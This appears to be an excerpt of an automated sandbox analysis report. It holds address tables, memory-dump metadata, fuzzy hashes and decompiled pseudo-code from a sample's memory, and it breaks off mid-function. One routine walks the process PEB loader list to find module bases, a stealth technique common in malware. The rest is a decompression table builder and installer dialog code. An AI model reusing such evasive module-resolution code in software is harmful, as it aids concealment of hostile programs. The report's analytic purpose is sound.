                                                                                        0x00406d07
                                                                                        0x00406d0b
                                                                                        0x00406d0d
                                                                                        0x00406d10
                                                                                        0x00406d13
                                                                                        0x00406d18
                                                                                        0x00406d1b
                                                                                        0x00406d1d
                                                                                        0x00406d1e
                                                                                        0x00406d21
                                                                                        0x00406d2c
                                                                                        0x00406d2f
                                                                                        0x00406d46
                                                                                        0x00406d4b
                                                                                        0x00406d52
                                                                                        0x00406d57
                                                                                        0x00406d5b
                                                                                        0x00406d5d
                                                                                        0x00406d5d
                                                                                        0x00406d5d
                                                                                        0x00406d60
                                                                                        0x00406d62
                                                                                        0x00000000
                                                                                        0x00406d68
                                                                                        0x00406d68
                                                                                        0x00406d6c
                                                                                        0x00406d77
                                                                                        0x00406d8a
                                                                                        0x00406d8f
                                                                                        0x00406d94
                                                                                        0x00406d96
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406d9c
                                                                                        0x00406d9c
                                                                                        0x00406d9f
                                                                                        0x00406da1
                                                                                        0x00406daf
                                                                                        0x00406daf
                                                                                        0x00406db2
                                                                                        0x00406db2
                                                                                        0x00406db5
                                                                                        0x00406db8
                                                                                        0x00406dbb
                                                                                        0x00406dbe
                                                                                        0x00406dc1
                                                                                        0x00406dc4
                                                                                        0x00000000
                                                                                        0x00406dc4
                                                                                        0x00406da3
                                                                                        0x00406da3
                                                                                        0x00406da9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406da9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407148
                                                                                        0x00407148
                                                                                        0x0040714e
                                                                                        0x00407154
                                                                                        0x00407159
                                                                                        0x0040715f
                                                                                        0x00407165
                                                                                        0x00407167
                                                                                        0x0040716a
                                                                                        0x00407173
                                                                                        0x00407179
                                                                                        0x00407179
                                                                                        0x0040716c
                                                                                        0x0040716e
                                                                                        0x00407170
                                                                                        0x00407170
                                                                                        0x0040717b
                                                                                        0x0040717d
                                                                                        0x00407180
                                                                                        0x004071bb
                                                                                        0x004071bb
                                                                                        0x00000000
                                                                                        0x00407182
                                                                                        0x00407182
                                                                                        0x00407182
                                                                                        0x00407188
                                                                                        0x0040718b
                                                                                        0x0040718d
                                                                                        0x004071c2
                                                                                        0x004071c4
                                                                                        0x00000000
                                                                                        0x004071c4
                                                                                        0x00000000
                                                                                        0x0040718d
                                                                                        0x00000000
                                                                                        0x004067cc
                                                                                        0x0040719a
                                                                                        0x00000000
                                                                                        0x0040719a
                                                                                        0x00406bae
                                                                                        0x00406bb0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406bb2
                                                                                        0x00406bb2
                                                                                        0x00406bb5
                                                                                        0x00000000
                                                                                        0x00406bb5
                                                                                        0x00406afa
                                                                                        0x00406abb
                                                                                        0x0040719f
                                                                                        0x004071a2
                                                                                        0x004071a4
                                                                                        0x004071ad
                                                                                        0x004071b3
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                        • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                                                        • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                                        • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407272, Relevance: .3, Instructions: 300COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6d0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6d0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                        0x0040727d
                                                                                        0x00407285
                                                                                        0x00407289
                                                                                        0x0040728b
                                                                                        0x0040728e
                                                                                        0x00407290
                                                                                        0x00407290
                                                                                        0x00407292
                                                                                        0x00407299
                                                                                        0x0040729b
                                                                                        0x0040729b
                                                                                        0x004072a1
                                                                                        0x004072b6
                                                                                        0x004072be
                                                                                        0x004072c0
                                                                                        0x004072c2
                                                                                        0x004072c5
                                                                                        0x004072c6
                                                                                        0x004072c6
                                                                                        0x004072cc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004072ce
                                                                                        0x004072d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004072d1
                                                                                        0x004072d5
                                                                                        0x004072d8
                                                                                        0x004072da
                                                                                        0x004072da
                                                                                        0x004072dd
                                                                                        0x004072e3
                                                                                        0x004072e4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004072e4
                                                                                        0x004072e9
                                                                                        0x004072ec
                                                                                        0x004072ee
                                                                                        0x004072ee
                                                                                        0x004072f4
                                                                                        0x004072f6
                                                                                        0x00407307
                                                                                        0x004072fa
                                                                                        0x004072fe
                                                                                        0x004075a3
                                                                                        0x00000000
                                                                                        0x004075a3
                                                                                        0x00407304
                                                                                        0x00407305
                                                                                        0x00407305
                                                                                        0x0040730d
                                                                                        0x00407310
                                                                                        0x00407314
                                                                                        0x00407316
                                                                                        0x00407318
                                                                                        0x0040731b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407323
                                                                                        0x00407329
                                                                                        0x0040732b
                                                                                        0x0040732d
                                                                                        0x0040732e
                                                                                        0x00407343
                                                                                        0x00407343
                                                                                        0x00407346
                                                                                        0x00407348
                                                                                        0x00407348
                                                                                        0x0040734a
                                                                                        0x0040734f
                                                                                        0x00407351
                                                                                        0x00407358
                                                                                        0x0040735a
                                                                                        0x00407362
                                                                                        0x00407362
                                                                                        0x00407364
                                                                                        0x00407365
                                                                                        0x00407374
                                                                                        0x00407378
                                                                                        0x0040737c
                                                                                        0x0040737f
                                                                                        0x00407382
                                                                                        0x00407387
                                                                                        0x0040738a
                                                                                        0x00407390
                                                                                        0x00407397
                                                                                        0x0040739d
                                                                                        0x00407596
                                                                                        0x00407596
                                                                                        0x0040759b
                                                                                        0x004075aa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040759b
                                                                                        0x004073aa
                                                                                        0x004073ad
                                                                                        0x004073b0
                                                                                        0x004073b3
                                                                                        0x004073b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004073c2
                                                                                        0x004073c5
                                                                                        0x004073c6
                                                                                        0x004073c8
                                                                                        0x004073ce
                                                                                        0x004073d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004073d7
                                                                                        0x004073d8
                                                                                        0x004073db
                                                                                        0x004073de
                                                                                        0x004073e1
                                                                                        0x004073e7
                                                                                        0x004073e9
                                                                                        0x004073e9
                                                                                        0x004073f1
                                                                                        0x004073f5
                                                                                        0x004073fa
                                                                                        0x0040741f
                                                                                        0x00407425
                                                                                        0x00407427
                                                                                        0x00407429
                                                                                        0x0040742c
                                                                                        0x00407435
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004073fc
                                                                                        0x004073fc
                                                                                        0x00407405
                                                                                        0x00407409
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040741a
                                                                                        0x0040741a
                                                                                        0x0040741d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040740d
                                                                                        0x00407410
                                                                                        0x00407412
                                                                                        0x00407416
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407418
                                                                                        0x00407418
                                                                                        0x00000000
                                                                                        0x0040741a
                                                                                        0x0040743e
                                                                                        0x00407444
                                                                                        0x0040744e
                                                                                        0x00407450
                                                                                        0x00407455
                                                                                        0x00407457
                                                                                        0x0040748d
                                                                                        0x00407459
                                                                                        0x00407459
                                                                                        0x0040745c
                                                                                        0x0040745f
                                                                                        0x00407469
                                                                                        0x0040746c
                                                                                        0x00407473
                                                                                        0x0040747e
                                                                                        0x00407485
                                                                                        0x00407485
                                                                                        0x0040748f
                                                                                        0x00407492
                                                                                        0x00407494
                                                                                        0x0040749a
                                                                                        0x0040749a
                                                                                        0x004074a3
                                                                                        0x004074a6
                                                                                        0x004074ab
                                                                                        0x004074ba
                                                                                        0x004074c2
                                                                                        0x004074c7
                                                                                        0x004074eb
                                                                                        0x004074f3
                                                                                        0x004074f7
                                                                                        0x004074fd
                                                                                        0x004074c9
                                                                                        0x004074d7
                                                                                        0x004074da
                                                                                        0x004074e0
                                                                                        0x004074e0
                                                                                        0x00407501
                                                                                        0x004074bc
                                                                                        0x004074bc
                                                                                        0x004074bc
                                                                                        0x00407512
                                                                                        0x00407516
                                                                                        0x00407522
                                                                                        0x0040751d
                                                                                        0x00407520
                                                                                        0x00407520
                                                                                        0x0040752a
                                                                                        0x0040752f
                                                                                        0x00407537
                                                                                        0x00407533
                                                                                        0x00407535
                                                                                        0x00407535
                                                                                        0x0040753d
                                                                                        0x0040753f
                                                                                        0x00407546
                                                                                        0x00407550
                                                                                        0x0040755a
                                                                                        0x00407576
                                                                                        0x0040757a
                                                                                        0x004073bf
                                                                                        0x004073c5
                                                                                        0x004073c6
                                                                                        0x004073c8
                                                                                        0x004073ce
                                                                                        0x004073d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004073d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040755c
                                                                                        0x0040755c
                                                                                        0x0040755c
                                                                                        0x00407561
                                                                                        0x0040756a
                                                                                        0x00407573
                                                                                        0x00000000
                                                                                        0x00407573
                                                                                        0x00407580
                                                                                        0x00407580
                                                                                        0x00407583
                                                                                        0x0040758a
                                                                                        0x0040758d
                                                                                        0x00000000
                                                                                        0x004073b0
                                                                                        0x00407330
                                                                                        0x00407332
                                                                                        0x00407332
                                                                                        0x00407336
                                                                                        0x00407339
                                                                                        0x0040733a
                                                                                        0x0040733a
                                                                                        0x00000000
                                                                                        0x00407332
                                                                                        0x004072a6
                                                                                        0x004072ac
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                        • Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
                                                                                        • Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
                                                                                        • Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FC24785, Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E6FC24785(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E6FC246C9(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}








                                                                                        0x6fc24791
                                                                                        0x6fc2479a
                                                                                        0x6fc247a3
                                                                                        0x6fc247ac
                                                                                        0x6fc247af
                                                                                        0x6fc247ce
                                                                                        0x6fc247d7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc247d9
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                        • Instruction ID: 7d04be3fd25cbc945c82bb298f144886edd146dbba66bcebb95b733dd01294a9
                                                                                        • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                        • Instruction Fuzzy Hash: 9E010D79A15218EFCB81DFA9C584A9DBBF4FF09720F118596E814EB721E331AE50DB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FC24582, Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E6FC24582() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                                                                        0x6fc24599

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                        • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                        • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                        • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x6301d0
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
